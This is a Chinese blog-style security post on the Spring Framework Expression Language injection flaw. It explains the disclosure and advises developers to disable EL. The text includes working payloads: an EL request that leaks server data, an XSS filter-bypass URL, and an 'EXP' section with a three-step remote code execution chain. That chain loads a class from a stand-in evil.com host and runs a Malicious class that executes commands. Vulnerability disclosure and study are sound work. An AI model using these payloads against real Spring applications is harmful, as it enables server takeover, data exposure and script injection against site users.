Spring爆远程代码执行漏洞(含EXP)

简介: 上周也就是在1月16日左右,安全公司Aspect Security透露在Spring框架的开发代码中,发现了一个重大的安全漏洞。

上周也就是在1月16日左右,安全公司Aspect Security透露在Spring框架的开发代码中,发现了一个重大的安全漏洞。该漏洞被命名为“remote code with Expression Language injection”。他们发现,通过发送特定的Spring标签,可以导致服务器上的敏感数据暴露、执行任意代码等。(PS:该漏洞早在2011年就发现了,只是未对外公布。)

威廉姆斯称,Spring未来版本中将有可能默认不启用表达式语言功能,但是,目前存在的这个漏洞,如果被攻击者利用,可能会对应用程序产生大的威胁。这是非常危险的,攻击者可以完全接管一个Web应用程序,并在服务器上运行他们的代码。他还指出,该漏洞跟最近披露的浏览器Java漏洞无任何联系。

据提供开源组件的中央仓库Sonatype数据显示,目前已有超过2.2万个机构下载了超过130万次存在安全漏洞的Spring框架。

下面节选了部分在Glassfish+EL 2.2远程执行代码的列子,完整Paper查看地址

0×01:
发起请求如下:

http://vulnerable.com/foo?message=${applicationScope}

页面如果包含

<spring:message text="" code="${param['message']}"></spring:message>

会导致输出服务器的一些敏感信息,包括classpath和本地工作目录等。

0×02:
当应用程序做了过滤器,会对所有’<’和’>’进行过滤。利用Expression Language特性,可尝试如下绕过过滤:

http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPPP

发起该请求之后,当String.replaceAll方法被调用的时候。该语句会返回一段文本,并插入spring:message tag,返回的错误代码中会显示QQQQQQ。

最终成功执行XSS,绕过过滤器的语句如下:

http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”<”).replaceAll(“Q”,”>”)}&foo=PscriptQalert(1);P/scriptQ

根据老外放出的Paper,我们可以看到能成功执行任意代码。但是到目前为止,还没有任何快速修复补丁放出。因此,使用Spring框架的应用程序可能存在安全隐患,建议开发者关闭表达式语言功能。

补充:

0×03:远程执行EXP

1.建立一个ArrayList以构造一个URLClassLoader,并且需要在session中存着,可以在后面利用。

${pageContext.request.getSession().setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}

2.通过URL对象载入远程执行的代码类

${pageContext.request.getSession().getAttribute("arr").add(pageContext.getServletContext().getResource("/").toURI().create("http://evil.com/path/to/where/malicious/classfile/is/located/").toURL())}

远程执行的代码类(运行一个计算器)

public class Malicious {
       public Malicious() { 
	   try {
                     java.lang.Runtime.getRuntime().exec("open -a Calculator"); //Mac
                     java.lang.Runtime.getRuntime().exec("calc.exe"); //Win
              } catch (Exception e) {    
              }
       }
}

3.执行代码,打开一个计算器(运行结果截图见上文)

${pageContext.getClass().getClassLoader().getParent().newInstance(pageContext.request.getSession().getAttribute("arr").toArray(pageContext.getClass().getClassLoader().getParent().getURLs())).loadClass("Malicious").newInstance()}

关于Spring

Spring是一个开源框架,Sping 是于2003 年兴起的一个轻量级的Java 开发框架,由Rod Johnson 在其著作Expert One-On-One J2EE Development and Design中阐述的部分理念和原型衍生而来。它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。


目录
相关文章
|
安全 Java 开发者
刚折腾完Log4J,又爆Spring RCE核弹级漏洞
继Log4J爆出安全漏洞之后,又在深夜,Spring的github上又更新了一条可能造成RCE(远程命令执行漏洞)的问题代码,随即在国内的安全圈炸开了锅。有安全专家建议升级到JDK 9以上,有些专家又建议回滚到JDK 7以下,一时间小伙伴们不知道该怎么办了。大家来看一段动画演示,怎么改都是“将军"。
118 1
|
4月前
|
安全 Java 网络安全
Spring Framework JDK >= 9 远程代码执行(CVE-2022-22965)
Spring Framework JDK >= 9 远程代码执行(CVE-2022-22965)
|
开发框架 安全 Java
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。
439 1
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
|
安全 Java API
Spring_Cloud_Gateway远程代码执行(CVE-2022-22947)
Spring_Cloud_Gateway远程代码执行(CVE-2022-22947)
329 0
Spring_Cloud_Gateway远程代码执行(CVE-2022-22947)
|
安全 Java Serverless
Spring Cloud Function SPEL 远程命令执行漏洞
Spring Cloud Function SPEL 远程命令执行漏洞
459 0
|
SQL 安全 前端开发
如何预防SQL注入,XSS漏洞(spring,java)
SQL注入是由于程序员对用户输入的参数没有做好校验,让不法分子钻了SQL的空子,
353 0
|
安全 IDE Java
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
|
监控 安全 IDE
【墨菲安全实验室】Spring Cloud Gateway代码注入漏洞分析
【墨菲安全实验室】Spring Cloud Gateway代码注入漏洞分析
【墨菲安全实验室】Spring Cloud Gateway代码注入漏洞分析
|
3月前
|
SQL 监控 druid
springboot-druid数据源的配置方式及配置后台监控-自定义和导入stater(推荐-简单方便使用)两种方式配置druid数据源
这篇文章介绍了如何在Spring Boot项目中配置和监控Druid数据源,包括自定义配置和使用Spring Boot Starter两种方法。
|
2月前
|
人工智能 自然语言处理 前端开发
SpringBoot + 通义千问 + 自定义React组件:支持EventStream数据解析的技术实践
【10月更文挑战第7天】在现代Web开发中,集成多种技术栈以实现复杂的功能需求已成为常态。本文将详细介绍如何使用SpringBoot作为后端框架,结合阿里巴巴的通义千问(一个强大的自然语言处理服务),并通过自定义React组件来支持服务器发送事件(SSE, Server-Sent Events)的EventStream数据解析。这一组合不仅能够实现高效的实时通信,还能利用AI技术提升用户体验。
184 2